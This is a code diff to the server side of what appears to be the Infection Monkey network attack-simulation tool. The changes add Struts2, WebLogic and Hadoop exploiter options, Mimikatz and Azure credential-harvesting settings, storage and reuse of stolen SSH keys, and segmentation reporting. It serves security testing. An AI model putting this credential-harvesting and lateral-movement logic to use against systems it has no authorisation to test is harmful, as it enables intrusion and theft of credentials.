[mongo.db[x].drop() for x in mongo.db.collection_names() if not x.startswith('system.')] [mongo.db[x].drop() for x in mongo.db.collection_names() if not x.startswith('system.')]
ConfigService.init_config() ConfigService.init_config()
logger.info('DB was reset')
return jsonify(status='OK') return jsonify(status='OK')
@staticmethod @staticmethod
@ -50,6 +54,7 @@ class Root(flask_restful.Resource):
mongo.db.monkey.update({'dead': False}, {'$set': {'config.alive': False, 'modifytime': datetime.now()}}, mongo.db.monkey.update({'dead': False}, {'$set': {'config.alive': False, 'modifytime': datetime.now()}},
upsert=False, upsert=False,
multi=True) multi=True)
logger.info('Kill all monkeys was called')
return jsonify(status='OK') return jsonify(status='OK')
@staticmethod @staticmethod
@ -57,5 +62,8 @@ class Root(flask_restful.Resource):
def get_completed_steps(): def get_completed_steps():
is_any_exists = NodeService.is_any_monkey_exists() is_any_exists = NodeService.is_any_monkey_exists()
infection_done = NodeService.is_monkey_finished_running() infection_done = NodeService.is_monkey_finished_running()
report_done = ReportService.is_report_generated() if not infection_done:
report_done = False
else:
report_done = ReportService.is_report_generated()
return dict(run_server=True, run_monkey=is_any_exists, infection_done=infection_done, report_done=report_done) return dict(run_server=True, run_monkey=is_any_exists, infection_done=infection_done, report_done=report_done)

View File

@ -1,4 +1,5 @@
import json import json
import logging
import traceback import traceback
import copy import copy
from datetime import datetime from datetime import datetime
@ -17,6 +18,9 @@ from cc.encryptor import encryptor
__author__ = 'Barak' __author__ = 'Barak'
logger = logging.getLogger(__name__)
class Telemetry(flask_restful.Resource): class Telemetry(flask_restful.Resource):
@jwt_required() @jwt_required()
def get(self, **kw): def get(self, **kw):
@ -52,10 +56,9 @@ class Telemetry(flask_restful.Resource):
if telem_type in TELEM_PROCESS_DICT: if telem_type in TELEM_PROCESS_DICT:
TELEM_PROCESS_DICT[telem_type](telemetry_json) TELEM_PROCESS_DICT[telem_type](telemetry_json)
else: else:
print('Got unknown type of telemetry: %s' % telem_type) logger.info('Got unknown type of telemetry: %s' % telem_type)
except StandardError as ex: except Exception as ex:
print("Exception caught while processing telemetry: %s" % str(ex)) logger.error("Exception caught while processing telemetry", exc_info=True)
traceback.print_exc()
telem_id = mongo.db.telemetry.insert(telemetry_json) telem_id = mongo.db.telemetry.insert(telemetry_json)
return mongo.db.telemetry.find_one_or_404({"_id": telem_id}) return mongo.db.telemetry.find_one_or_404({"_id": telem_id})
@ -130,7 +133,7 @@ class Telemetry(flask_restful.Resource):
for attempt in telemetry_json['data']['attempts']: for attempt in telemetry_json['data']['attempts']:
if attempt['result']: if attempt['result']:
found_creds = {'user': attempt['user']} found_creds = {'user': attempt['user']}
for field in ['password', 'lm_hash', 'ntlm_hash']: for field in ['password', 'lm_hash', 'ntlm_hash', 'ssh_key']:
if len(attempt[field]) != 0: if len(attempt[field]) != 0:
found_creds[field] = attempt[field] found_creds[field] = attempt[field]
NodeService.add_credentials_to_node(edge['to'], found_creds) NodeService.add_credentials_to_node(edge['to'], found_creds)
@ -167,12 +170,24 @@ class Telemetry(flask_restful.Resource):
@staticmethod @staticmethod
def process_system_info_telemetry(telemetry_json): def process_system_info_telemetry(telemetry_json):
if 'ssh_info' in telemetry_json['data']:
ssh_info = telemetry_json['data']['ssh_info']
Telemetry.encrypt_system_info_ssh_keys(ssh_info)
if telemetry_json['data']['network_info']['networks']:
# We use user_name@machine_ip as the name of the ssh key stolen, thats why we need ip from telemetry
Telemetry.add_ip_to_ssh_keys(telemetry_json['data']['network_info']['networks'][0], ssh_info)
Telemetry.add_system_info_ssh_keys_to_config(ssh_info)
if 'credentials' in telemetry_json['data']: if 'credentials' in telemetry_json['data']:
creds = telemetry_json['data']['credentials'] creds = telemetry_json['data']['credentials']
Telemetry.encrypt_system_info_creds(creds) Telemetry.encrypt_system_info_creds(creds)
Telemetry.add_system_info_creds_to_config(creds) Telemetry.add_system_info_creds_to_config(creds)
Telemetry.replace_user_dot_with_comma(creds) Telemetry.replace_user_dot_with_comma(creds)
@staticmethod
def add_ip_to_ssh_keys(ip, ssh_info):
for key in ssh_info:
key['ip'] = ip['addr']
@staticmethod @staticmethod
def process_trace_telemetry(telemetry_json): def process_trace_telemetry(telemetry_json):
# Nothing to do # Nothing to do
@ -193,6 +208,13 @@ class Telemetry(flask_restful.Resource):
# this encoding is because we might run into passwords which are not pure ASCII # this encoding is because we might run into passwords which are not pure ASCII
creds[user][field] = encryptor.enc(creds[user][field].encode('utf-8')) creds[user][field] = encryptor.enc(creds[user][field].encode('utf-8'))
@staticmethod
def encrypt_system_info_ssh_keys(ssh_info):
for idx, user in enumerate(ssh_info):
for field in ['public_key', 'private_key', 'known_hosts']:
if ssh_info[idx][field]:
ssh_info[idx][field] = encryptor.enc(ssh_info[idx][field].encode('utf-8'))
@staticmethod @staticmethod
def add_system_info_creds_to_config(creds): def add_system_info_creds_to_config(creds):
for user in creds: for user in creds:
@ -204,6 +226,15 @@ class Telemetry(flask_restful.Resource):
if 'ntlm_hash' in creds[user]: if 'ntlm_hash' in creds[user]:
ConfigService.creds_add_ntlm_hash(creds[user]['ntlm_hash']) ConfigService.creds_add_ntlm_hash(creds[user]['ntlm_hash'])
@staticmethod
def add_system_info_ssh_keys_to_config(ssh_info):
for user in ssh_info:
ConfigService.creds_add_username(user['name'])
# Public key is useless without private key
if user['public_key'] and user['private_key']:
ConfigService.ssh_add_keys(user['public_key'], user['private_key'],
user['name'], user['ip'])
@staticmethod @staticmethod
def encrypt_exploit_creds(telemetry_json): def encrypt_exploit_creds(telemetry_json):
attempts = telemetry_json['data']['attempts'] attempts = telemetry_json['data']['attempts']

View File

@ -1,7 +1,9 @@
import copy import copy
import collections import collections
import functools import functools
import logging
from jsonschema import Draft4Validator, validators from jsonschema import Draft4Validator, validators
from six import string_types
from cc.database import mongo from cc.database import mongo
from cc.encryptor import encryptor from cc.encryptor import encryptor
@ -10,6 +12,8 @@ from cc.utils import local_ip_addresses
__author__ = "itay.mizeretz" __author__ = "itay.mizeretz"
logger = logging.getLogger(__name__)
WARNING_SIGN = u" \u26A0" WARNING_SIGN = u" \u26A0"
SCHEMA = { SCHEMA = {
@ -76,6 +80,27 @@ SCHEMA = {
], ],
"title": "ElasticGroovy Exploiter" "title": "ElasticGroovy Exploiter"
}, },
{
"type": "string",
"enum": [
"Struts2Exploiter"
],
"title": "Struts2 Exploiter"
},
{
"type": "string",
"enum": [
"WebLogicExploiter"
],
"title": "Oracle Web Logic Exploiter"
},
{
"type": "string",
"enum": [
"HadoopExploiter"
],
"title": "Hadoop/Yarn Exploiter"
}
] ]
}, },
"finger_classes": { "finger_classes": {
@ -117,6 +142,14 @@ SCHEMA = {
], ],
"title": "MySQLFinger" "title": "MySQLFinger"
}, },
{
"type": "string",
"enum": [
"MSSQLFinger"
],
"title": "MSSQLFinger"
},
{ {
"type": "string", "type": "string",
"enum": [ "enum": [
@ -217,6 +250,31 @@ SCHEMA = {
" Examples: \"192.168.0.1\", \"192.168.0.5-192.168.0.20\", \"192.168.0.5/24\"" " Examples: \"192.168.0.1\", \"192.168.0.5-192.168.0.20\", \"192.168.0.5/24\""
} }
} }
},
"network_analysis": {
"title": "Network Analysis",
"type": "object",
"properties": {
"inaccessible_subnets": {
"title": "Network segmentation testing",
"type": "array",
"uniqueItems": True,
"items": {
"type": "string"
},
"default": [
],
"description":
"Test for network segmentation by providing a list of"
" subnets that should NOT be accessible to each other."
" For example, given the following configuration:"
" '10.0.0.0/24, 11.0.0.2/32, 12.2.3.0/24'"
" a Monkey running on 10.0.0.5 will try to access machines in the following"
" subnets: 11.0.0.2/32, 12.2.3.0/24."
" An alert on successful connections will be shown in the report"
" Additional subnet formats include: 13.0.0.1, 13.0.0.1-13.0.0.5"
}
}
} }
} }
}, },
@ -260,6 +318,31 @@ SCHEMA = {
} }
} }
}, },
"system_info": {
"title": "System info",
"type": "object",
"properties": {
"extract_azure_creds": {
"title": "Harvest Azure Credentials",
"type": "boolean",
"default": True,
"description":
"Determine if the Monkey should try to harvest password credentials from Azure VMs"
},
"collect_system_info": {
"title": "Collect system info",
"type": "boolean",
"default": True,
"description": "Determines whether to collect system info"
},
"should_use_mimikatz": {
"title": "Should use Mimikatz",
"type": "boolean",
"default": True,
"description": "Determines whether to use Mimikatz"
},
}
},
"life_cycle": { "life_cycle": {
"title": "Life cycle", "title": "Life cycle",
"type": "object", "type": "object",
@ -320,12 +403,6 @@ SCHEMA = {
"description": "description":
"The name of the mutex used to determine whether the monkey is already running" "The name of the mutex used to determine whether the monkey is already running"
}, },
"collect_system_info": {
"title": "Collect system info",
"type": "boolean",
"default": True,
"description": "Determines whether to collect system info"
},
"keep_tunnel_open_time": { "keep_tunnel_open_time": {
"title": "Keep tunnel open time", "title": "Keep tunnel open time",
"type": "integer", "type": "integer",
@ -363,6 +440,7 @@ SCHEMA = {
"PingScanner", "PingScanner",
"HTTPFinger", "HTTPFinger",
"MySQLFinger", "MySQLFinger",
"MSSQLFinger",
"ElasticFinger" "ElasticFinger"
], ],
"description": "Determines which classes to use for fingerprinting" "description": "Determines which classes to use for fingerprinting"
@ -504,26 +582,16 @@ SCHEMA = {
}, },
"default": [], "default": [],
"description": "List of NTLM hashes to use on exploits using credentials" "description": "List of NTLM hashes to use on exploits using credentials"
}
}
},
"systemInfo": {
"title": "System collection",
"type": "object",
"properties": {
"mimikatz_dll_name": {
"title": "Mimikatz DLL name",
"type": "string",
"default": "mk.dll",
"description":
"Name of Mimikatz DLL (should be the same as in the monkey's pyinstaller spec file)"
}, },
"extract_azure_creds": { "exploit_ssh_keys": {
"title": "Harvest Azure Credentials", "title": "SSH key pairs list",
"type": "boolean", "type": "array",
"default": True, "uniqueItems": True,
"description": "default": [],
"Determine if the Monkey should try to harvest password credentials from Azure VMs" "items": {
"type": "string"
},
"description": "List of SSH key pairs to use, when trying to ssh into servers"
} }
} }
} }
@ -545,7 +613,7 @@ SCHEMA = {
"type": "string" "type": "string"
}, },
"default": [ "default": [
"41.50.73.31:5000" "192.0.2.0:5000"
], ],
"description": "List of command servers to try and communicate with (format is <ip>:<port>)" "description": "List of command servers to try and communicate with (format is <ip>:<port>)"
}, },
@ -567,7 +635,7 @@ SCHEMA = {
"current_server": { "current_server": {
"title": "Current server", "title": "Current server",
"type": "string", "type": "string",
"default": "41.50.73.31:5000", "default": "192.0.2.0:5000",
"description": "The current command server the monkey is communicating with" "description": "The current command server the monkey is communicating with"
} }
} }
@ -595,7 +663,10 @@ SCHEMA = {
"SSHExploiter", "SSHExploiter",
"ShellShockExploiter", "ShellShockExploiter",
"SambaCryExploiter", "SambaCryExploiter",
"ElasticGroovyExploiter" "ElasticGroovyExploiter",
"Struts2Exploiter",
"WebLogicExploiter",
"HadoopExploiter"
], ],
"description": "description":
"Determines which exploits to use. " + WARNING_SIGN "Determines which exploits to use. " + WARNING_SIGN
@ -730,7 +801,8 @@ SCHEMA = {
80, 80,
8080, 8080,
443, 443,
8008 8008,
7001
], ],
"description": "List of ports the monkey will check if are being used for HTTP" "description": "List of ports the monkey will check if are being used for HTTP"
}, },
@ -752,7 +824,8 @@ SCHEMA = {
443, 443,
8008, 8008,
3306, 3306,
9200 9200,
7001
], ],
"description": "List of TCP ports the monkey will check whether they're open" "description": "List of TCP ports the monkey will check whether they're open"
}, },
@ -800,7 +873,8 @@ ENCRYPTED_CONFIG_ARRAYS = \
[ [
['basic', 'credentials', 'exploit_password_list'], ['basic', 'credentials', 'exploit_password_list'],
['internal', 'exploits', 'exploit_lm_hash_list'], ['internal', 'exploits', 'exploit_lm_hash_list'],
['internal', 'exploits', 'exploit_ntlm_hash_list'] ['internal', 'exploits', 'exploit_ntlm_hash_list'],
['internal', 'exploits', 'exploit_ssh_keys']
] ]
@ -888,11 +962,24 @@ class ConfigService:
def creds_add_ntlm_hash(ntlm_hash): def creds_add_ntlm_hash(ntlm_hash):
ConfigService.add_item_to_config_set('internal.exploits.exploit_ntlm_hash_list', ntlm_hash) ConfigService.add_item_to_config_set('internal.exploits.exploit_ntlm_hash_list', ntlm_hash)
@staticmethod
def ssh_add_keys(public_key, private_key, user, ip):
if not ConfigService.ssh_key_exists(ConfigService.get_config_value(['internal', 'exploits', 'exploit_ssh_keys'],
False, False), user, ip):
ConfigService.add_item_to_config_set('internal.exploits.exploit_ssh_keys',
{"public_key": public_key, "private_key": private_key,
"user": user, "ip": ip})
@staticmethod
def ssh_key_exists(keys, user, ip):
return [key for key in keys if key['user'] == user and key['ip'] == ip]
@staticmethod @staticmethod
def update_config(config_json, should_encrypt): def update_config(config_json, should_encrypt):
if should_encrypt: if should_encrypt:
ConfigService.encrypt_config(config_json) ConfigService.encrypt_config(config_json)
mongo.db.config.update({'name': 'newconfig'}, {"$set": config_json}, upsert=True) mongo.db.config.update({'name': 'newconfig'}, {"$set": config_json}, upsert=True)
logger.info('monkey config was updated')
@staticmethod @staticmethod
def init_default_config(): def init_default_config():
@ -908,6 +995,7 @@ class ConfigService:
config = copy.deepcopy(ConfigService.default_config) config = copy.deepcopy(ConfigService.default_config)
if should_encrypt: if should_encrypt:
ConfigService.encrypt_config(config) ConfigService.encrypt_config(config)
logger.info("Default config was called")
return config return config
@staticmethod @staticmethod
@ -921,6 +1009,7 @@ class ConfigService:
config = ConfigService.get_default_config(True) config = ConfigService.get_default_config(True)
ConfigService.set_server_ips_in_config(config) ConfigService.set_server_ips_in_config(config)
ConfigService.update_config(config, should_encrypt=False) ConfigService.update_config(config, should_encrypt=False)
logger.info('Monkey config reset was called')
@staticmethod @staticmethod
def set_server_ips_in_config(config): def set_server_ips_in_config(config):
@ -937,6 +1026,7 @@ class ConfigService:
initial_config['name'] = 'initial' initial_config['name'] = 'initial'
initial_config.pop('_id') initial_config.pop('_id')
mongo.db.config.insert(initial_config) mongo.db.config.insert(initial_config)
logger.info('Monkey config was inserted to mongo and saved')
@staticmethod @staticmethod
def _extend_config_with_default(validator_class): def _extend_config_with_default(validator_class):
@ -978,8 +1068,12 @@ class ConfigService:
""" """
keys = [config_arr_as_array[2] for config_arr_as_array in ENCRYPTED_CONFIG_ARRAYS] keys = [config_arr_as_array[2] for config_arr_as_array in ENCRYPTED_CONFIG_ARRAYS]
for key in keys: for key in keys:
if isinstance(flat_config[key], collections.Sequence) and not isinstance(flat_config[key], basestring): if isinstance(flat_config[key], collections.Sequence) and not isinstance(flat_config[key], string_types):
flat_config[key] = [encryptor.dec(item) for item in flat_config[key]] # Check if we are decrypting ssh key pair
if flat_config[key] and isinstance(flat_config[key][0], dict) and 'public_key' in flat_config[key][0]:
flat_config[key] = [ConfigService.decrypt_ssh_key_pair(item) for item in flat_config[key]]
else:
flat_config[key] = [encryptor.dec(item) for item in flat_config[key]]
else: else:
flat_config[key] = encryptor.dec(flat_config[key]) flat_config[key] = encryptor.dec(flat_config[key])
return flat_config return flat_config
@ -992,4 +1086,19 @@ class ConfigService:
config_arr = config_arr[config_key_part] config_arr = config_arr[config_key_part]
for i in range(len(config_arr)): for i in range(len(config_arr)):
config_arr[i] = encryptor.dec(config_arr[i]) if is_decrypt else encryptor.enc(config_arr[i]) # Check if array of shh key pairs and then decrypt
if isinstance(config_arr[i], dict) and 'public_key' in config_arr[i]:
config_arr[i] = ConfigService.decrypt_ssh_key_pair(config_arr[i]) if is_decrypt else \
ConfigService.decrypt_ssh_key_pair(config_arr[i], True)
else:
config_arr[i] = encryptor.dec(config_arr[i]) if is_decrypt else encryptor.enc(config_arr[i])
@staticmethod
def decrypt_ssh_key_pair(pair, encrypt=False):
if encrypt:
pair['public_key'] = encryptor.enc(pair['public_key'])
pair['private_key'] = encryptor.enc(pair['private_key'])
else:
pair['public_key'] = encryptor.dec(pair['public_key'])
pair['private_key'] = encryptor.dec(pair['private_key'])
return pair

View File

@ -0,0 +1,32 @@
import logging
__author__ = "Maor.Rayzin"
logger = logging.getLogger(__name__)
class IslandLogService:
def __init__(self):
pass
@staticmethod
def get_log_file():
"""
This static function is a helper function for the monkey island log download function.
It finds the logger handlers and checks if one of them is a fileHandler of any kind by checking if the handler
has the property handler.baseFilename.
:return:
a dict with the log file content.
"""
logger_handlers = logger.parent.handlers
for handler in logger_handlers:
if hasattr(handler, 'baseFilename'):
logger.info('Log file found: {0}'.format(handler.baseFilename))
log_file_path = handler.baseFilename
with open(log_file_path, 'rt') as f:
log_file = f.read()
return {
'log_file': log_file
}
logger.warning('No log file could be found, check logger config.')
return None

View File

@ -1,15 +1,25 @@
import itertools
import functools
import ipaddress import ipaddress
import logging
from enum import Enum from enum import Enum
from six import text_type
from cc.database import mongo from cc.database import mongo
from cc.services.config import ConfigService from cc.services.config import ConfigService
from cc.services.edge import EdgeService from cc.services.edge import EdgeService
from cc.services.node import NodeService from cc.services.node import NodeService
from cc.utils import local_ip_addresses, get_subnets from cc.utils import local_ip_addresses, get_subnets
from common.network.network_range import NetworkRange
__author__ = "itay.mizeretz" __author__ = "itay.mizeretz"
logger = logging.getLogger(__name__)
class ReportService: class ReportService:
def __init__(self): def __init__(self):
pass pass
@ -24,6 +34,9 @@ class ReportService:
'ElasticGroovyExploiter': 'Elastic Groovy Exploiter', 'ElasticGroovyExploiter': 'Elastic Groovy Exploiter',
'Ms08_067_Exploiter': 'Conficker Exploiter', 'Ms08_067_Exploiter': 'Conficker Exploiter',
'ShellShockExploiter': 'ShellShock Exploiter', 'ShellShockExploiter': 'ShellShock Exploiter',
'Struts2Exploiter': 'Struts2 Exploiter',
'WebLogicExploiter': 'Oracle WebLogic Exploiter',
'HadoopExploiter': 'Hadoop/Yarn Exploiter'
} }
class ISSUES_DICT(Enum): class ISSUES_DICT(Enum):
@ -34,6 +47,10 @@ class ReportService:
SHELLSHOCK = 4 SHELLSHOCK = 4
CONFICKER = 5 CONFICKER = 5
AZURE = 6 AZURE = 6
STOLEN_SSH_KEYS = 7
STRUTS2 = 8
WEBLOGIC = 9,
HADOOP = 10
class WARNINGS_DICT(Enum): class WARNINGS_DICT(Enum):
CROSS_SEGMENT = 0 CROSS_SEGMENT = 0
@ -77,6 +94,8 @@ class ReportService:
creds = ReportService.get_azure_creds() creds = ReportService.get_azure_creds()
machines = set([instance['origin'] for instance in creds]) machines = set([instance['origin'] for instance in creds])
logger.info('Azure issues generated for reporting')
return [ return [
{ {
'type': 'azure_password', 'type': 'azure_password',
@ -103,6 +122,8 @@ class ReportService:
} }
for node in nodes] for node in nodes]
logger.info('Scanned nodes generated for reporting')
return nodes return nodes
@staticmethod @staticmethod
@ -124,6 +145,8 @@ class ReportService:
} }
for monkey in exploited] for monkey in exploited]
logger.info('Exploited nodes generated for reporting')
return exploited return exploited
@staticmethod @staticmethod
@ -147,6 +170,28 @@ class ReportService:
'origin': origin 'origin': origin
} }
) )
logger.info('Stolen creds generated for reporting')
return creds
@staticmethod
def get_ssh_keys():
"""
Return private ssh keys found as credentials
:return: List of credentials
"""
creds = []
for telem in mongo.db.telemetry.find(
{'telem_type': 'system_info_collection', 'data.ssh_info': {'$exists': True}},
{'data.ssh_info': 1, 'monkey_guid': 1}
):
origin = NodeService.get_monkey_by_guid(telem['monkey_guid'])['hostname']
if telem['data']['ssh_info']:
# Pick out all ssh keys not yet included in creds
ssh_keys = [{'username': key_pair['name'], 'type': 'Clear SSH private key',
'origin': origin} for key_pair in telem['data']['ssh_info']
if key_pair['private_key'] and {'username': key_pair['name'], 'type': 'Clear SSH private key',
'origin': origin} not in creds]
creds.extend(ssh_keys)
return creds return creds
@staticmethod @staticmethod
@ -167,6 +212,8 @@ class ReportService:
azure_leaked_users = [{'username': user.replace(',', '.'), 'type': 'Clear Password', azure_leaked_users = [{'username': user.replace(',', '.'), 'type': 'Clear Password',
'origin': origin} for user in azure_users] 'origin': origin} for user in azure_users]
creds.extend(azure_leaked_users) creds.extend(azure_leaked_users)
logger.info('Azure machines creds generated for reporting')
return creds return creds
@staticmethod @staticmethod
@ -182,9 +229,12 @@ class ReportService:
for attempt in exploit['data']['attempts']: for attempt in exploit['data']['attempts']:
if attempt['result']: if attempt['result']:
processed_exploit['username'] = attempt['user'] processed_exploit['username'] = attempt['user']
if len(attempt['password']) > 0: if attempt['password']:
processed_exploit['type'] = 'password' processed_exploit['type'] = 'password'
processed_exploit['password'] = attempt['password'] processed_exploit['password'] = attempt['password']
elif attempt['ssh_key']:
processed_exploit['type'] = 'ssh_key'
processed_exploit['ssh_key'] = attempt['ssh_key']
else: else:
processed_exploit['type'] = 'hash' processed_exploit['type'] = 'hash'
return processed_exploit return processed_exploit
@ -210,8 +260,12 @@ class ReportService:
@staticmethod @staticmethod
def process_ssh_exploit(exploit): def process_ssh_exploit(exploit):
processed_exploit = ReportService.process_general_creds_exploit(exploit) processed_exploit = ReportService.process_general_creds_exploit(exploit)
processed_exploit['type'] = 'ssh' # Check if it's ssh key or ssh login credentials exploit
return processed_exploit if processed_exploit['type'] == 'ssh_key':
return processed_exploit
else:
processed_exploit['type'] = 'ssh'
return processed_exploit
@staticmethod @staticmethod
def process_rdp_exploit(exploit): def process_rdp_exploit(exploit):
@ -246,6 +300,24 @@ class ReportService:
processed_exploit['paths'] = ['/' + url.split(':')[2].split('/')[1] for url in urls] processed_exploit['paths'] = ['/' + url.split(':')[2].split('/')[1] for url in urls]
return processed_exploit return processed_exploit
@staticmethod
def process_struts2_exploit(exploit):
processed_exploit = ReportService.process_general_exploit(exploit)
processed_exploit['type'] = 'struts2'
return processed_exploit
@staticmethod
def process_weblogic_exploit(exploit):
processed_exploit = ReportService.process_general_exploit(exploit)
processed_exploit['type'] = 'weblogic'
return processed_exploit
@staticmethod
def process_hadoop_exploit(exploit):
processed_exploit = ReportService.process_general_exploit(exploit)
processed_exploit['type'] = 'hadoop'
return processed_exploit
@staticmethod @staticmethod
def process_exploit(exploit): def process_exploit(exploit):
exploiter_type = exploit['data']['exploiter'] exploiter_type = exploit['data']['exploiter']
@ -258,6 +330,9 @@ class ReportService:
'ElasticGroovyExploiter': ReportService.process_elastic_exploit, 'ElasticGroovyExploiter': ReportService.process_elastic_exploit,
'Ms08_067_Exploiter': ReportService.process_conficker_exploit, 'Ms08_067_Exploiter': ReportService.process_conficker_exploit,
'ShellShockExploiter': ReportService.process_shellshock_exploit, 'ShellShockExploiter': ReportService.process_shellshock_exploit,
'Struts2Exploiter': ReportService.process_struts2_exploit,
'WebLogicExploiter': ReportService.process_weblogic_exploit,
'HadoopExploiter': ReportService.process_hadoop_exploit
} }
return EXPLOIT_PROCESS_FUNCTION_DICT[exploiter_type](exploit) return EXPLOIT_PROCESS_FUNCTION_DICT[exploiter_type](exploit)
@ -282,12 +357,12 @@ class ReportService:
return \ return \
[ [
ipaddress.ip_interface(unicode(network['addr'] + '/' + network['netmask'])).network ipaddress.ip_interface(text_type(network['addr'] + '/' + network['netmask'])).network
for network in network_info['data']['network_info']['networks'] for network in network_info['data']['network_info']['networks']
] ]
@staticmethod @staticmethod
def get_cross_segment_issues(): def get_island_cross_segment_issues():
issues = [] issues = []
island_ips = local_ip_addresses() island_ips = local_ip_addresses()
for monkey in mongo.db.monkey.find({'tunnel': {'$exists': False}}, {'tunnel': 1, 'guid': 1, 'hostname': 1}): for monkey in mongo.db.monkey.find({'tunnel': {'$exists': False}}, {'tunnel': 1, 'guid': 1, 'hostname': 1}):
@ -295,29 +370,174 @@ class ReportService:
monkey_subnets = ReportService.get_monkey_subnets(monkey['guid']) monkey_subnets = ReportService.get_monkey_subnets(monkey['guid'])
for subnet in monkey_subnets: for subnet in monkey_subnets:
for ip in island_ips: for ip in island_ips:
if ipaddress.ip_address(unicode(ip)) in subnet: if ipaddress.ip_address(text_type(ip)) in subnet:
found_good_ip = True found_good_ip = True
break break
if found_good_ip: if found_good_ip:
break break
if not found_good_ip: if not found_good_ip:
issues.append( issues.append(
{'type': 'cross_segment', 'machine': monkey['hostname'], {'type': 'island_cross_segment', 'machine': monkey['hostname'],
'networks': [str(subnet) for subnet in monkey_subnets], 'networks': [str(subnet) for subnet in monkey_subnets],
'server_networks': [str(subnet) for subnet in get_subnets()]} 'server_networks': [str(subnet) for subnet in get_subnets()]}
) )
return issues return issues
@staticmethod
def get_ip_in_src_and_not_in_dst(ip_addresses, source_subnet, target_subnet):
"""
Finds an IP address in ip_addresses which is in source_subnet but not in target_subnet.
:param ip_addresses: List of IP addresses to test.
:param source_subnet: Subnet to want an IP to not be in.
:param target_subnet: Subnet we want an IP to be in.
:return:
"""
for ip_address in ip_addresses:
if target_subnet.is_in_range(ip_address):
return None
for ip_address in ip_addresses:
if source_subnet.is_in_range(ip_address):
return ip_address
return None
@staticmethod
def get_cross_segment_issues_of_single_machine(source_subnet_range, target_subnet_range):
"""
Gets list of cross segment issues of a single machine. Meaning a machine has an interface for each of the
subnets.
:param source_subnet_range: The subnet range which shouldn't be able to access target_subnet.
:param target_subnet_range: The subnet range which shouldn't be accessible from source_subnet.
:return:
"""
cross_segment_issues = []
for monkey in mongo.db.monkey.find({}, {'ip_addresses': 1, 'hostname': 1}):
ip_in_src = None
ip_in_dst = None
for ip_addr in monkey['ip_addresses']:
if source_subnet_range.is_in_range(unicode(ip_addr)):
ip_in_src = ip_addr
break
# No point searching the dst subnet if there are no IPs in src subnet.
if not ip_in_src:
continue
for ip_addr in monkey['ip_addresses']:
if target_subnet_range.is_in_range(unicode(ip_addr)):
ip_in_dst = ip_addr
break
if ip_in_dst:
cross_segment_issues.append(
{
'source': ip_in_src,
'hostname': monkey['hostname'],
'target': ip_in_dst,
'services': None,
'is_self': True
})
return cross_segment_issues
@staticmethod
def get_cross_segment_issues_per_subnet_pair(scans, source_subnet, target_subnet):
"""
Gets list of cross segment issues from source_subnet to target_subnet.
:param scans: List of all scan telemetry entries. Must have monkey_guid, ip_addr and services.
This should be a PyMongo cursor object.
:param source_subnet: The subnet which shouldn't be able to access target_subnet.
:param target_subnet: The subnet which shouldn't be accessible from source_subnet.
:return:
"""
if source_subnet == target_subnet:
return []
source_subnet_range = NetworkRange.get_range_obj(source_subnet)
target_subnet_range = NetworkRange.get_range_obj(target_subnet)
cross_segment_issues = []
scans.rewind() # If we iterated over scans already we need to rewind.
for scan in scans:
target_ip = scan['data']['machine']['ip_addr']
if target_subnet_range.is_in_range(unicode(target_ip)):
monkey = NodeService.get_monkey_by_guid(scan['monkey_guid'])
cross_segment_ip = ReportService.get_ip_in_src_and_not_in_dst(monkey['ip_addresses'],
source_subnet_range,
target_subnet_range)
if cross_segment_ip is not None:
cross_segment_issues.append(
{
'source': cross_segment_ip,
'hostname': monkey['hostname'],
'target': target_ip,
'services': scan['data']['machine']['services'],
'is_self': False
})
return cross_segment_issues + ReportService.get_cross_segment_issues_of_single_machine(
source_subnet_range, target_subnet_range)
@staticmethod
def get_cross_segment_issues_per_subnet_group(scans, subnet_group):
"""
Gets list of cross segment issues within given subnet_group.
:param scans: List of all scan telemetry entries. Must have monkey_guid, ip_addr and services.
This should be a PyMongo cursor object.
:param subnet_group: List of subnets which shouldn't be accessible from each other.
:return: Cross segment issues regarding the subnets in the group.
"""
cross_segment_issues = []
for subnet_pair in itertools.product(subnet_group, subnet_group):
source_subnet = subnet_pair[0]
target_subnet = subnet_pair[1]
pair_issues = ReportService.get_cross_segment_issues_per_subnet_pair(scans, source_subnet, target_subnet)
if len(pair_issues) != 0:
cross_segment_issues.append(
{
'source_subnet': source_subnet,
'target_subnet': target_subnet,
'issues': pair_issues
})
return cross_segment_issues
@staticmethod
def get_cross_segment_issues():
scans = mongo.db.telemetry.find({'telem_type': 'scan'},
{'monkey_guid': 1, 'data.machine.ip_addr': 1, 'data.machine.services': 1})
cross_segment_issues = []
# For now the feature is limited to 1 group.
subnet_groups = [ConfigService.get_config_value(['basic_network', 'network_analysis', 'inaccessible_subnets'])]
for subnet_group in subnet_groups:
cross_segment_issues += ReportService.get_cross_segment_issues_per_subnet_group(scans, subnet_group)
return cross_segment_issues
@staticmethod @staticmethod
def get_issues(): def get_issues():
issues = ReportService.get_exploits() + ReportService.get_tunnels() + ReportService.get_cross_segment_issues() + ReportService.get_azure_issues() ISSUE_GENERATORS = [
ReportService.get_exploits,
ReportService.get_tunnels,
ReportService.get_island_cross_segment_issues,
ReportService.get_azure_issues
]
issues = functools.reduce(lambda acc, issue_gen: acc + issue_gen(), ISSUE_GENERATORS, [])
issues_dict = {} issues_dict = {}
for issue in issues: for issue in issues:
machine = issue['machine'] machine = issue['machine']
if machine not in issues_dict: if machine not in issues_dict:
issues_dict[machine] = [] issues_dict[machine] = []
issues_dict[machine].append(issue) issues_dict[machine].append(issue)
logger.info('Issues generated for reporting')
return issues_dict return issues_dict
@staticmethod @staticmethod
@ -371,8 +591,16 @@ class ReportService:
issues_byte_array[ReportService.ISSUES_DICT.CONFICKER.value] = True issues_byte_array[ReportService.ISSUES_DICT.CONFICKER.value] = True
elif issue['type'] == 'azure_password': elif issue['type'] == 'azure_password':
issues_byte_array[ReportService.ISSUES_DICT.AZURE.value] = True issues_byte_array[ReportService.ISSUES_DICT.AZURE.value] = True
elif issue['type'] == 'ssh_key':
issues_byte_array[ReportService.ISSUES_DICT.STOLEN_SSH_KEYS.value] = True
elif issue['type'] == 'struts2':
issues_byte_array[ReportService.ISSUES_DICT.STRUTS2.value] = True
elif issue['type'] == 'weblogic':
issues_byte_array[ReportService.ISSUES_DICT.WEBLOGIC.value] = True
elif issue['type'] == 'hadoop':
issues_byte_array[ReportService.ISSUES_DICT.HADOOP.value] = True
elif issue['type'].endswith('_password') and issue['password'] in config_passwords and \ elif issue['type'].endswith('_password') and issue['password'] in config_passwords and \
issue['username'] in config_users: issue['username'] in config_users or issue['type'] == 'ssh':
issues_byte_array[ReportService.ISSUES_DICT.WEAK_PASSWORD.value] = True issues_byte_array[ReportService.ISSUES_DICT.WEAK_PASSWORD.value] = True
